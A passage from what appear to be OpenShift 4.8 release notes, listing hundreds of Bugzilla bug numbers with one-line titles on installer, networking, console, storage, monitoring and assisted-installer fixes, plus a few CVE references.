CIS Benchmark 5.4.1 Fails on ROKS 4: Prefer using secrets as files over secrets as environment variables 1955854 - Ingress clusteroperator reports Degraded=True/Available=False if any ingresscontroller is degraded or unavailable 1955862 - Local Storage Operator using LocalVolume CR fails to create PV's when backend storage failure is simulated 1955874 - Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct 1955879 - Customer tags cannot be seen in S3 level when set spec.managementState from Managed-> Removed-> Managed in configs.imageregistry with high ratio 1955969 - Workers cannot be deployed attached to multiple networks. 1956079 - Installer gather doesn't collect any networking information 1956208 - Installer should validate root volume type 1956220 - Set htt proxy system properties as expected by kubernetes-client 1956281 - Disconnected installs are failing with kubelet trying to pause image from the internet 1956334 - Event Listener Details page does not show Triggers section 1956353 - test: analyze job consistently fails 1956372 - openshift-gcp-routes causes disruption during upgrade by stopping before all pods terminate 1956405 - Bump k8s dependencies in cluster resource override admission operator 1956411 - Apply custom tags to AWS EBS volumes 1956480 - [4.8] Bootimage bump tracker 1956606 - probes FlowSchema manifest not included in any cluster profile 1956607 - Multiple manifests lack cluster profile annotations 1956609 - [cluster-machine-approver] CSRs for replacement control plane nodes not approved after restore from backup 1956610 - manage-helm-repos manifest lacks cluster profile annotations 1956611 - OLM CRD schema validation failing against CRs where the value of a string field is a blank string 1956650 - The container disk URL is empty for Windows guest tools 1956768 - aws-ebs-csi-driver-controller-metrics TargetDown 1956826 - buildArgs does not work when the value is taken from a secret 1956895 - Fix chatty kubelet log message 1956898 - fix log files being overwritten on container state loss 1956920 - can't open terminal for pods that have more than one container running 1956959 - ipv6 disconnected sno crd deployment hive reports success status and clusterdeployrmet reporting false 1956978 - Installer gather doesn't include pod names in filename 1957039 - Physical VIP for pod -> Svc -> Host is incorrectly set to an IP of 169.254.169.2 for Local GW 1957041 - Update CI e2echart with more node info 1957127 - Delegated authentication: reduce the number of watch requests 1957131 - Conformance tests for OpenStack require the Cinder client that is not included in the "tests" image 1957146 - Only run test/extended/router/idle tests on OpenshiftSDN or OVNKubernetes 1957149 - CI: "Managed cluster should start all core operators" fails with: OpenStackCinderDriverStaticResourcesControllerDegraded: "volumesnapshotclass.yaml" (string): missing dynamicClient 1957179 - Incorrect VERSION in node_exporter 1957190 - CI jobs failing due too many watch requests (prometheus-operator) 1957198 - Misspelled console-operator condition 1957227 - Issue replacing the EnvVariables using the unsupported ConfigMap 1957260 - [4.8] [gcp] Installer is missing new region/zone europe-central2 1957261 - update godoc for new build status image change trigger fields 1957295 - Apply priority classes conventions as test to openshift/origin repo 1957315 - kuryr-controller doesn't indicate being out of quota 1957349 - [Azure] Machine object showing Failed phase even node is ready and VM is running properly 1957374 - mcddrainerr doesn't list specific pod 1957386 - Config serve and validate command should be under alpha 1957446 - prepare CCO for future without v1beta1 CustomResourceDefinitions 1957502 - Infrequent panic in kube-apiserver in aws-serial job 1957561 - lack of pseudolocalization for some text on Cluster Setting page 1957584 - Routes are not getting created when using hostname without FQDN standard 1957597 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone 1957645 - Event "Updated PrometheusRule.monitoring.coreos.com/v1 because it changed" is frequently looped with weird empty {} changes 1957708 - e2e-metal-ipi and related jobs fail to bootstrap due to multiple VIP's 1957726 - Pod stuck in ContainerCreating - Failed to start transient scope unit: Connection timed out 1957748 - Ptp operator pod should have CPU and memory requests set but not limits 1957756 - Device Replacemet UI, The status of the disk is "replacement ready" before I clicked on "start replacement" 1957772 - ptp daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent 1957775 - CVO creating cloud-controller-manager too early causing upgrade failures 1957809 - [OSP] Install with invalid platform.openstack.machinesSubnet results in runtime error 1957822 - Update apiserver tlsSecurityProfile description to include Custom profile 1957832 - CMO end-to-end tests work only on AWS 1957856 - 'resource name may not be empty' is shown in CI testing 1957869 - baremetal IPI power_interface for irmc is inconsistent 1957879 - cloud-controller-manage ClusterOperator manifest does not declare relatedObjects 1957889 - Incomprehensible documentation of the GatherClusterOperatorPodsAndEvents gatherer 1957893 - ClusterDeployment / Agent conditions show "ClusterAlreadyInstalling" during each spoke install 1957895 - Cypress helper projectDropdown.shouldContain is not an assertion 1957908 - Many e2e failed requests caused by kube-storage-version-migrator-operator's version reads 1957926 - "Add Capacity" should allow to add n3 (or n4) local devices at once 1957951 - [aws] destroy can get blocked on instances stuck in shutting-down state 1957967 - Possible test flake in listPage Cypress view 1957972 - Leftover templates from mdns 1957976 - Ironic execute_deploy_steps command to ramdisk times out, resulting in a failed deployment in 4.7 1957982 - Deployment Actions clickable for view-only projects 1957991 - ClusterOperatorDegraded can fire during installation 1958015 - "config-reloader-cpu" and "config-reloader-memory" flags have been deprecated for prometheus-operator 1958080 - Missing i18n for login, error and selectprovider pages 1958094 - Audit log files are corrupted sometimes 1958097 - don't show "old, insecure token format" if the token does not actually exist 1958114 - Ignore staged vendor files in pre-commit script 1958126 - [OVN]Egressip doesn't take effect 1958158 - OAuth proxy container for AlertManager and Thanos are flooding the logs 1958216 - ocp libvirt: dnsmasq options in install config should allow duplicate option names 1958245 - cluster-etcd-operator: static pod revision is not visible from etcd logs 1958285 - Deployment considered unhealthy despite being available and at latest generation 1958296 - OLM must explicitly alert on deprecated APIs in use 1958329 - pick 97428: add more context to log after a request times out 1958367 - Build metrics do not aggregate totals by build strategy 1958391 - Update MCO KubeletConfig to mixin the API Server TLS Security Profile Singleton 1958405 - etcd: current health checks and reporting are not adequate to ensure availability 1958406 - Twistlock flags mode of /var/run/crio/crio.sock 1958420 - openshift-install 4.7.10 fails with segmentation error 1958424 - aws: support more auth options in manual mode 1958439 - Install/Upgrade button on Install/Upgrade Helm Chart page does not work with Form View 1958492 - CCO: pod-identity-webhook still accesses APIRemovedInNextReleaseInUse 1958643 - All pods creation stuck due to SR-IOV webhook timeout 1958679 - Compression on pool can't be disabled via UI 1958753 - VMI nic tab is not loadable 1958759 - Pulling Insights report is missing retry logic 1958811 - VM creation fails on API version mismatch 1958812 - Cluster upgrade halts as machine-config-daemon fails to parse rpm-ostree status during cluster upgrades 1958861 - [CCO] pod-identity-webhook certificate request failed 1958868 - ssh copy is missing when vm is running 1958884 - Confusing error message when volume AZ not found 1958913 - "Replacing an unhealthy etcd member whose node is not ready" procedure results in new etcd pod in CrashLoopBackOff 1958930 - network config in machine configs prevents addition of new nodes with static networking via kargs 1958958 - [SCALE] segfault with ovnkube adding to address set 1958972 - [SCALE] deadlock in ovn-kube when scaling up to 300 nodes 1959041 - LSO Cluster UI,"Troubleshoot" link does not exist after scale down osd pod 1959058 - ovn-kubernetes has lock contention on the LSP cache 1959158 - packageserver clusteroperator Available condition set to false on any Deployment spec change 1959177 - Descheduler dev manifests are missing permissions 1959190 - Set LABEL io.openshift.release.operator=true for driver-toolkit image addition to payload 1959194 - Ingress controller should use minReadySeconds because otherwise it is disrupted during deployment updates 1959278 - Should remove prometheus servicemonitor from openshift-user-workload-monitoring 1959294 - openshift-operator-lifecycle-manager:olm-operator-serviceaccount should not rely on external networking for health check 1959327 - Degraded nodes on upgrade - Cleaning bootversions: Read-only file system 1959406 - Difficult to debug performance on ovn-k without pprof enabled 1959471 - Kube sysctl conformance tests are disabled, meaning we can't submit conformance results 1959479 - machines doesn't support dual-stack loadbalancers on Azure 1959513 - Cluster-kube-apiserver does not use library-go for audit pkg 1959519 - Operand details page only renders one status donut no matter how many 'podStatuses' descriptors are used 1959550 - Overly generic CSS rules for dd and dt elements breaks styling elsewhere in console 1959564 - Test verify /run filesystem contents failing 1959648 - oc adm top --help indicates that oc adm top can display storage usage while it cannot 1959650 - Gather SDI-related MachineConfigs 1959658 - showing a lot "constructing many client instances from the same exec auth config" 1959696 - Deprecate 'ConsoleConfigRoute' struct in console-operator config 1959699 - [RFE] Collect LSO pod log and daemonset log managed by LSO 1959703 - Bootstrap gather gets into an infinite loop on bootstrap-in-place mode 1959711 - Egressnetworkpolicy doesn't work when configure the EgressIP 1959786 - [dualstack]EgressIP doesn't work on dualstack cluster for IPv6 1959916 - Console not works well against a proxy in front of openshift clusters 1959920 - UEFISecureBoot set not on the right master node 1959981 - [OCPonRHV] - Affinity Group should not create by default if we define empty affinityGroupsNames: [] 1960035 - iptables is missing from ose-keepalived-ipfailover image 1960059 - Remove "Grafana UI" link from Console Monitoring > Dashboards page 1960089 - ImageStreams list page, detail page and breadcrumb are not following CamelCase conventions 1960129 - [e2e][automation] add smoke tests about VM pages and actions 1960134 - some origin images are not public 1960171 - Enable SNO checks for image-registry 1960176 - CCO should recreate a user for the component when it was removed from the cloud providers 1960205 - The kubelet log flooded with reconcileState message once CPU manager enabled 1960255 - fixed obfuscation permissions 1960257 - breaking changes in pr template 1960284 - ExternalTrafficPolicy Local does not preserve connections correctly on shutdown, policy Cluster has significant performance cost 1960323 - Address issues raised by coverity security scan 1960324 - manifests: extra "spec.version" in console quickstarts makes CVO hotloop 1960330 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960334 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960337 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960339 - manifests: unset "preemptionPolicy" makes CVO hotloop 1960531 - Items under 'Current Bandwidth' for Dashboard 'Kubernetes / Networking / Pod' keep added for every access 1960534 - Some graphs of console dashboards have no legend and tooltips are difficult to undstand compared with grafana 1960546 - Add virt_platform metric to the collected metrics 1960554 - Remove rbacv1beta1 handling code 1960612 - Node disk info in overview/details does not account for second drive where /var is located 1960619 - Image registry integration tests use old-style OAuth tokens 1960683 - GlobalConfigPage is constantly requesting resources 1960711 - Enabling IPsec runtime causing incorrect MTU on Pod interfaces 1960716 - Missing details for debugging 1960732 - Outdated manifests directory in CSI driver operator repositories 1960757 - [OVN] hostnetwork pod can access MCS port 22623 or 22624 on master 1960758 - oc debug / oc adm must-gather do not require openshift/tools and openshift/must-gather to be "the newest" 1960767 - /metrics endpoint of the Grafana UI is accessible without authentication 1960780 - CI: failed to create PDB "service-test" the server could not find the requested resource 1961064 - Documentation link to network policies is outdated 1961067 - Improve log gathering logic 1961081 - policy/v1beta1 PodDisruptionBudget is deprecated in v1.21+, unavailable in v1.25+; use policy/v1 PodDisruptionBudget in CMO logs 1961091 - Gather MachineHealthCheck definitions 1961120 - CSI driver operators fail when upgrading a cluster 1961173 - recreate existing static pod manifests instead of updating 1961201 - [sig-network-edge] DNS should answer A and AAAA queries for a dual-stack service is constantly failing 1961314 - Race condition in operator-registry pull retry unit tests 1961320 - CatalogSource does not emit any metrics to indicate if it's ready or not 1961336 - Devfile sample for BuildConfig is not defined 1961356 - Update single quotes to double quotes in string 1961363 - Minor string update for " No Storage classes found in cluster, adding source is disabled." 1961393 - DetailsPage does not work with group~version~kind 1961452 - Remove "Alertmanager UI" link from Console Monitoring > Alerting page 1961466 - Some dropdown placeholder text on route creation page is not translated 1961472 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true 1961506 - NodePorts do not work on RHEL 7.9 workers (was "4.7 -> 4.8 upgrade is stuck at Ingress operator Degraded with rhel 7.9 workers") 1961536 - clusterdeployment without pull secret is crashing assisted service pod 1961538 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop 1961545 - Fixing Documentation Generation 1961550 - HAproxy pod logs showing error "another server named 'pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080' was already defined at line 326, please use distinct names" 1961554 - respect the shutdown-delay-duration from OpenShiftAPIServerConfig 1961561 - The encryption controllers send lots of request to an API server 1961582 - Build failure on s390x 1961644 - NodeAuthenticator tests are failing in IPv6 1961656 - driver-toolkit missing some release metadata 1961675 - Kebab menu of taskrun contains Edit options which should not be present 1961701 - Enhance gathering of events 1961717 - Update runtime dependencies to Wallaby builds for bugfixes 1961829 - Quick starts prereqs not shown when description is long 1961852 - Excessive lock contention when adding many pods selected by the same NetworkPolicy 1961878 - Add Sprint 199 translations 1961897 - Remove history listener before console UI is unmounted 1961925 - New ManagementCPUsOverride admission plugin blocks pod creation in clusters with no nodes 1962062 - Monitoring dashboards should support default values of "All" 1962074 - SNO:the pod get stuck in CreateContainerError and prompt "failed to add conmon to systemd sandbox cgroup: dial unix /run/systemd/private: connect: resource temporarily unavailable" after adding a performanceprofile 1962095 - Replace gather-job image without FQDN 1962153 - VolumeSnapshot routes are ambiguous, too generic 1962172 - Single node CI e2e tests kubelet metrics endpoints intermittent downtime 1962219 - NTO relies on unreliable leader-for-life implementation. 1962256 - use RHEL8 as the vm-example 1962261 - Monitoring components requesting more memory than they use 1962274 - OCP on RHV installer fails to generate an install-config with only 2 hosts in RHV cluster 1962347 - Cluster does not exist logs after successful installation 1962392 - After upgrade from 4.5.16 to 4.6.17, customer's application is seeing re-transmits 1962415 - duplicate zone information for in-tree PV after enabling migration 1962429 - Cannot create windows vm because kubemacpool.io denied the request 1962525 - [Migration] SDN migration stuck on MCO on RHV cluster 1962569 - NetworkPolicy details page should also show Egress rules 1962592 - Worker nodes restarting during OS installation 1962602 - Cloud credential operator scrolls info "unable to provide upcoming..." on unsupported platform 1962630 - NTO: Ship the current upstream TuneD 1962687 - openshift-kube-storage-version-migrator pod failed due to Error: container has runAsNonRoot and image will run as root 1962698 - Console-operator can not create resource console-public configmap in the openshift-config-managed namespace 1962718 - CVE-2021-29622 prometheus: open redirect under the /new endpoint 1962740 - Add documentation to Egress Router 1962850 - [4.8] Bootimage bump tracker 1962882 - Version pod does not set priorityClassName 1962905 - Ramdisk ISO source defaulting to "http" breaks deployment on a good amount of BMCs 1963068 - ironic container should not specify the entrypoint 1963079 - KCM/KS: ability to enforce localhost communication with the API server. 1963154 - Current BMAC reconcile flow skips Ironic's deprovision step 1963159 - Add Sprint 200 translations 1963204 - Update to 8.4 IPA images 1963205 - Installer is using old redirector 1963208 - Translation typos/inconsistencies for Sprint 200 files 1963209 - Some strings in public.json have errors 1963211 - Fix grammar issue in kubevirt-plugin.json string 1963213 - Memsource download script running into API error 1963219 - ImageStreamTags not internationalized 1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment 1963267 - Warning: Invalid DOM property classname. Did you mean className? console warnings in volumes table 1963502 - create template from is not descriptive 1963676 - in vm wizard when selecting an os template it looks like selecting the flavor too 1963833 - Cluster monitoring operator crashlooping on single node clusters due to segfault 1963848 - Use OS-shipped stalld vs. the NTO-shipped one. 1963866 - NTO: use the latest k8s 1.21.1 and openshift vendor dependencies 1963871 - cluster-etcd-operator:[build] upgrade to go 1.16 1963896 - The VM disks table does not show easy links to PVCs 1963912 - "[sig-network] DNS should provide DNS for {services, cluster, subdomain, hostname}" failures on vsphere 1963932 - Installation failures in bootstrap in OpenStack release jobs 1963964 - Characters are not escaped on config ini file causing Kuryr bootstrap to fail 1964059 - rebase openshift/sdn to kube 1.21.1 1964197 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration 1964203 - e2e-metal-ipi, e2e-metal-ipi-ovn-dualstack and e2e-metal-ipi-ovn-ipv6 are failing due to "Unknown provider baremetal" 1964243 - The oc compliance fetch-raw doesn’t work for disconnected cluster 1964270 - Failed to install 'cluster-kube-descheduler-operator' with error: "clusterkubedescheduleroperator.4.8.0-202105211057.p0.assembly.stream\": must be no more than 63 characters" 1964319 - Network policy "deny all" interpreted as "allow all" in description page 1964334 - alertmanager/prometheus/thanos-querier /metrics endpoints are not secured 1964472 - Make project and namespace requirements more visible rather than giving me an error after submission 1964486 - Bulk adding of CIDR IPS to whitelist is not working 1964492 - Pick 102171: Implement support for watch initialization in P&F 1964625 - NETID duplicate check is only required in NetworkPolicy Mode 1964748 - Sync upstream 1.7.2 downstream 1964756 - PVC status is always in 'Bound' status when it is actually cloning 1964847 - Sanity check test suite missing from the repo 1964888 - opoenshift-apiserver imagestreamimports depend on >34s timeout support, WAS: transport: loopyWriter.run returning. connection error: desc = "transport is closing" 1964936 - error log for "oc adm catalog mirror" is not correct 1964979 - Add mapping from ACI to infraenv to handle creation order issues 1964997 - Helm Library charts are showing and can be installed from Catalog 1965024 - [DR] backup and restore should perform consistency checks on etcd snapshots 1965092 - [Assisted-4.7] [Staging][OLM] Operators deployments start before all workers finished installation 1965283 - 4.7->4.8 upgrades: cluster operators are not ready: openshift-controller-manager (Upgradeable=Unknown NoData: ), service-ca (Upgradeable=Unknown NoData: 1965330 - oc image extract fails due to security capabilities on files 1965334 - opm index add fails during image extraction 1965367 - Typo in in etcd-metric-serving-ca resource name 1965370 - "Route" is not translated in Korean or Chinese 1965391 - When storage class is already present wizard do not jumps to "Stoarge and nodes" 1965422 - runc is missing Provides oci-runtime in rpm spec 1965522 - [v2v] Multiple typos on VM Import screen 1965545 - Pod stuck in ContainerCreating: Unit ...slice already exists 1965909 - Replace "Enable Taint Nodes" by "Mark nodes as dedicated" 1965921 - [oVirt] High performance VMs shouldn't be created with Existing policy 1965929 - kube-apiserver should use cert auth when reaching out to the oauth-apiserver with a TokenReview request 1966077 - hidden descriptor is visible in the Operator instance details page1966116 - DNS SRV request which worked in 4.7.9 stopped working in 4.7.11 1966126 - root_ca_cert_publisher_sync_duration_seconds metric can have an excessive cardinality 1966138 - (release-4.8) Update K8s & OpenShift API versions 1966156 - Issue with Internal Registry CA on the service pod 1966174 - No storage class is installed, OCS and CNV installations fail 1966268 - Workaround for Network Manager not supporting nmconnections priority 1966401 - Revamp Ceph Table in Install Wizard flow 1966410 - kube-controller-manager should not trigger APIRemovedInNextReleaseInUse alert 1966416 - (release-4.8) Do not exceed the data size limit 1966459 - 'policy/v1beta1 PodDisruptionBudget' and 'batch/v1beta1 CronJob' appear in image-registry-operator log 1966487 - IP address in Pods list table are showing node IP other than pod IP 1966520 - Add button from ocs add capacity should not be enabled if there are no PV's 1966523 - (release-4.8) Gather MachineAutoScaler definitions 1966546 - [master] KubeAPI - keep day1 after cluster is successfully installed 1966561 - Workload partitioning annotation workaround needed for CSV annotation propagation bug 1966602 - don't require manually setting IPv6DualStack feature gate in 4.8 1966620 - The bundle.Dockerfile in the repo is obsolete 1966632 - [4.8.0] [assisted operator] Unable to re-register an SNO instance if deleting CRDs during install 1966654 - Alertmanager PDB is not created, but Prometheus UWM is 1966672 - Add Sprint 201 translations 1966675 - Admin console string updates 1966677 - Change comma to semicolon 1966683 - Translation bugs from Sprint 201 files 1966684 - Verify "Creating snapshot for claim <1>{pvcName}</1>" displays correctly 1966697 - Garbage collector logs every interval - move to debug level 1966717 - include full timestamps in the logs 1966759 - Enable downstream plugin for Operator SDK 1966795 - [tests] Release 4.7 broken due to the usage of wrong OCS version 1966813 - "Replacing an unhealthy etcd member whose node is not ready" procedure results in new etcd pod in CrashLoopBackOff 1966862 - vsphere IPI - local dns prepender is not prepending nameserver 127.0.0.1 1966892 - [master] [Assisted-4.8][SNO] SNO node cannot transition into "Writing image to disk" from "Waiting for bootkub[e" 1966952 - [4.8.0] [Assisted-4.8][SNO][Dual Stack] DHCPv6 settings "ipv6.dhcp-duid=ll" missing from dual stack install 1967104 - [4.8.0] InfraEnv ctrl: log the amount of NMstate Configs baked into the image 1967126 - [4.8.0] [DOC] KubeAPI docs should clarify that the InfraEnv Spec pullSecretRef is currently ignored 1967197 - 404 errors loading some i18n namespaces 1967207 - Getting started card: console customization resources link shows other resources 1967208 - Getting started card should use semver library for parsing the version instead of string manipulation 1967234 - Console is continuously polling for ConsoleLink acm-link 1967275 - Awkward wrapping in getting started dashboard card 1967276 - Help menu tooltip overlays dropdown 1967398 - authentication operator still uses previous deleted pod ip rather than the new created pod ip to do health check 1967403 - (release-4.8) Increase workloads fingerprint gatherer pods limit 1967423 - [master] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion 1967444 - openshift-local-storage pods found with invalid priority class, should be openshift-user-critical or begin with system- while running e2e tests 1967531 - the ccoctl tool should extend MaxItems when listRoles, the default value 100 is a little small 1967578 - [4.8.0] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion 1967591 - The ManagementCPUsOverride admission plugin should not mutate containers with the limit 1967595 - Fixes the remaining lint issues 1967614 - prometheus-k8s pods can't be scheduled due to volume node affinity conflict 1967623 - [OCPonRHV] - ./openshift-install installation with install-config doesn't work if ovirt-config.yaml doesn't exist and user should fill the FQDN URL 1967625 - Add OpenShift Dockerfile for cloud-provider-aws 1967631 - [4.8.0] Cluster install failed due to timeout while "Waiting for control plane" 1967633 - [4.8.0] [Assisted-4.8][SNO] SNO node cannot transition into "Writing image to disk" from "Waiting for bootkube" 1967639 - Console whitescreens if user preferences fail to load 1967662 - machine-api-operator should not use deprecated "platform" field in infrastructures.config.openshift.io 1967667 - Add Sprint 202 Round 1 translations 1967713 - Insights widget shows invalid link to the OCM 1967717 - Insights Advisor widget is missing a description paragraph and contains deprecated naming 1967745 - When setting DNS node placement by toleration to not tolerate master node, effect value should not allow string other than "NoExecute" 1967803 - should update to 7.5.5 for grafana resources version label 1967832 - Add more tests for periodic.go 1967833 - Add tasks pool to tasks_processing 1967842 - Production logs are spammed on "OCS requirements validation status Insufficient hosts to deploy OCS. A minimum of 3 hosts is required to deploy OCS" 1967843 - Fix null reference to messagesToSearch in gather_logs.go 1967902 - [4.8.0] Assisted installer chrony manifests missing index numberring 1967933 - Network-Tools debug scripts not working as expected 1967945 - [4.8.0] [assisted operator] Assisted Service Postgres crashes msg: "mkdir: cannot create directory '/var/lib/pgsql/data/userdata': Permission denied" 1968019 - drain timeout and pool degrading period is too short 1968067 - [master] Agent validation not including reason for being insufficient 1968168 - [4.8.0] KubeAPI - keep day1 after cluster is successfully installed 1968175 - [4.8.0] Agent validation not including reason for being insufficient 1968373 - [4.8.0] BMAC re-attaches installed node on ISO regeneration 1968385 - [4.8.0] Infra env require pullSecretRef although it shouldn't be required 1968435 - [4.8.0] Unclear message in case of missing clusterImageSet 1968436 - Listeners timeout updated to remain using default value 1968449 - [4.8.0] Wrong Install-config override documentation 1968451 - [4.8.0] Garbage collector not cleaning up directories of removed clusters 1968452 - [4.8.0] [doc] "Mirror Registry Configuration" doc section needs clarification of functionality and limitations 1968454 - [4.8.0] backend events generated with wrong namespace for agent 1968455 - [4.8.0] Assisted Service operator's controllers are starting before the base service is ready 1968515 - oc should set user-agent when talking with registry 1968531 - Sync upstream 1.8.0 downstream 1968558 - [sig-cli] oc adm storage-admin [Suite:openshift/conformance/parallel] doesn't clean up properly 1968567 - [OVN] Egress router pod not running and openshift.io/scc is restricted 1968625 - Pods using sr-iov interfaces failign to start for Failed to create pod sandbox 1968700 - catalog-operator crashes when status.initContainerStatuses[].state.waiting is nil 1968701 - Bare metal IPI installation is failed due to worker inspection failure 1968754 - CI: e2e-metal-ipi-upgrade failing on KubeletHasDiskPressure, which triggers machine-config RequiredPoolsFailed 1969212 - [FJ OCP4.8 Bug - PUBLIC VERSION]: Masters repeat reboot every few minutes during workers provisioning 1969284 - Console Query Browser: Can't reset zoom to fixed time range after dragging to zoom 1969315 - [4.8.0] BMAC doesn't check if ISO Url changed before queuing BMH for reconcile 1969352 - [4.8.0] Creating BareMetalHost without the "inspect.metal3.io" does not automatically add it 1969363 - [4.8.0] Infra env should show the time that ISO was generated. 1969367 - [4.8.0] BMAC should wait for an ISO to exist for 1 minute before using it 1969386 - Filesystem's Utilization doesn't show in VM overview tab 1969397 - OVN bug causing subports to stay DOWN fails installations 1969470 - [4.8.0] Misleading error in case of install-config override bad input 1969487 - [FJ OCP4.8 Bug]: Avoid always do delete_configuration clean step 1969525 - Replace golint with revive 1969535 - Topology edit icon does not link correctly when branch name contains slash 1969538 - Install a VolumeSnapshotClass by default on CSI Drivers that support it 1969551 - [4.8.0] Assisted service times out on GetNextSteps due tooc adm release infotaking too long 1969561 - Test "an end user can use OLM can subscribe to the operator" generates deprecation alert 1969578 - installer: accesses v1beta1 RBAC APIs and causes APIRemovedInNextReleaseInUse to fire 1969599 - images without registry are being prefixed with registry.hub.docker.com instead of docker.io 1969601 - manifest for networks.config.openshift.io CRD uses deprecated apiextensions.k8s.io/v1beta1 1969626 - Portfoward stream cleanup can cause kubelet to panic 1969631 - EncryptionPruneControllerDegraded: etcdserver: request timed out 1969681 - MCO: maxUnavailable of ds/machine-config-daemon does not get updated due to missing resourcemerge check 1969712 - [4.8.0] Assisted service reports a malformed iso when we fail to download the base iso 1969752 - [4.8.0] [assisted operator] Installed Clusters are missing DNS setups 1969773 - [4.8.0] Empty cluster name on handleEnsureISOErrors log after applying InfraEnv.yaml 1969784 - WebTerminal widget should send resize events 1969832 - Applying a profile with multiple inheritance where parents include a common ancestor fails 1969891 - Fix rotated pipelinerun status icon issue in safari 1969900 - Test files should not use deprecated APIs that will trigger APIRemovedInNextReleaseInUse 1969903 - Provisioning a large number of hosts results in an unexpected delay in hosts becoming available 1969951 - Cluster local doesn't work for knative services created from dev console 1969969 - ironic-rhcos-downloader container uses and old base image 1970062 - ccoctl does not work with STS authentication 1970068 - ovnkube-master logs "Failed to find node ips for gateway" error 1970126 - [4.8.0] Disable "metrics-events" when deploying using the operator 1970150 - master pool is still upgrading when machine config reports level / restarts on osimageurl change 1970262 - [4.8.0] Remove Agent CRD Status fields not needed 1970265 - [4.8.0] Add State and StateInfo to DebugInfo in ACI and Agent CRDs 1970269 - [4.8.0] missing role in agent CRD 1970271 - [4.8.0] Add ProgressInfo to Agent and AgentClusterInstalll CRDs 1970381 - Monitoring dashboards: Custom time range inputs should retain their values 1970395 - [4.8.0] SNO with AI/operator - kubeconfig secret is not created until the spoke is deployed 1970401 - [4.8.0] AgentLabelSelector is required yet not supported 1970415 - SR-IOV Docs needs documentation for disabling port security on a network 1970470 - Add pipeline annotation to Secrets which are created for a private repo 1970494 - [4.8.0] Missing value-filling of log line in assisted-service operator pod 1970624 - 4.7->4.8 updates: AggregatedAPIDown for v1beta1.metrics.k8s.io 1970828 - "500 Internal Error" for all openshift-monitoring routes 1970975 - 4.7 -> 4.8 upgrades on AWS take longer than expected 1971068 - Removing invalid AWS instances from the CF templates 1971080 - 4.7->4.8 CI: KubePodNotReady due to MCD's 5m sleep between drain attempts 1971188 - Web Console does not show OpenShift Virtualization Menu with VirtualMachine CRDs of version v1alpha3 ! 1971293 - [4.8.0] Deleting agent from one namespace causes all agents with the same name to be deleted from all namespaces 1971308 - [4.8.0] AI KubeAPI AgentClusterInstall confusing "Validated" condition about VIP not matching machine network 1971529 - [Dummy bug for robot] 4.7.14 upgrade to 4.8 and then downgrade back to 4.7.14 doesn't work - clusteroperator/kube-apiserver is not upgradeable 1971589 - [4.8.0] Telemetry-client won't report metrics in case the cluster was installed using the assisted operator 1971630 - [4.8.0] ACM/ZTP with Wan emulation fails to start the agent service 1971632 - [4.8.0] ACM/ZTP with Wan emulation, several clusters fail to step past discovery 1971654 - [4.8.0] InfraEnv controller should always requeue for backend response HTTP StatusConflict (code 409) 1971739 - Keep /boot RW when kdump is enabled 1972085 - [4.8.0] Updating configmap within AgentServiceConfig is not logged properly 1972128 - ironic-static-ip-manager container still uses 4.7 base image 1972140 - [4.8.0] ACM/ZTP with Wan emulation, SNO cluster installs do not show as installed although they are 1972167 - Several operators degraded because Failed to create pod sandbox when installing an sts cluster 1972213 - Openshift Installer| UEFI mode | BM hosts have BIOS halted 1972262 - [4.8.0] "baremetalhost.metal3.io/detached" uses boolean value where string is expected 1972426 - Adopt failure can trigger deprovisioning 1972436 - [4.8.0] [DOCS] AgentServiceConfig examples in operator.md doc should each contain databaseStorage + filesystemStorage 1972526 - [4.8.0] clusterDeployments controller should send an event to InfraEnv for backend cluster registration 1972530 - [4.8.0] no indication for missing debugInfo in AgentClusterInstall 1972565 - performance issues due to lost node, pods taking too long to relaunch 1972662 - DPDK KNI modules need some additional tools 1972676 - Requirements for authenticating kernel modules with X.509 1972687 - Using bound SA tokens causes causes failures to /apis/authorization.openshift.io/v1/clusterrolebindings 1972690 - [4.8.0] infra-env condition message isn't informative in case of missing pull secret 1972702 - [4.8.0] Domain dummy.com (not belonging to Red Hat) is being used in a default configuration 1972768 - kube-apiserver setup fail while installing SNO due to port being used 1972864 - Newlocal-with-fallback` service annotation does not preserve source IP 1973018 - Ironic rhcos downloader breaks image cache in upgrade process from 4.7 to 4.8 1973117 - No storage class is installed, OCS and CNV installations fail 1973233 - remove kubevirt images and references 1973237 - RHCOS-shipped stalld systemd units do not use SCHED_FIFO to run stalld. 1973428 - Placeholder bug for OCP 4.8.0 image release 1973667 - [4.8] NetworkPolicy tests were mistakenly marked skipped 1973672 - fix ovn-kubernetes NetworkPolicy 4.7->4.8 upgrade issue 1973995 - [Feature:IPv6DualStack] tests are failing in dualstack 1974414 - Uninstalling kube-descheduler clusterkubedescheduleroperator.4.6.0-202106010807.p0.git.5db84c5 removes some clusterrolebindings 1974447 - Requirements for nvidia GPU driver container for driver toolkit 1974677 - [4.8.0] KubeAPI CVO progress is not available on CR/conditions only in events. 1974718 - Tuned net plugin fails to handle net devices with n/a value for a channel 1974743 - [4.8.0] All resources not being cleaned up after clusterdeployment deletion 1974746 - [4.8.0] File system usage not being logged appropriately 1974757 - [4.8.0] Assisted-service deployed on an IPv6 cluster installed with proxy: agentclusterinstall shows error pulling an image from quay. 1974773 - Using bound SA tokens causes fail to query cluster resource especially in a sts cluster 1974839 - CVE-2021-29059 nodejs-is-svg: Regular expression denial of service if the application is provided and checks a crafted invalid SVG string 1974850 - [4.8] coreos-installer failing Execshield 1974931 - [4.8.0] Assisted Service Operator should be Infrastructure Operator for Red Hat OpenShift 1974978 - 4.8.0.rc0 upgrade hung, stuck on DNS clusteroperator progressing 1975155 - Kubernetes service IP cannot be accessed for rhel worker 1975227 - [4.8.0] KubeAPI Move conditions consts to CRD types 1975360 - [4.8.0] [master] timeout on kubeAPI subsystem test: SNO full install and validate MetaData 1975404 - 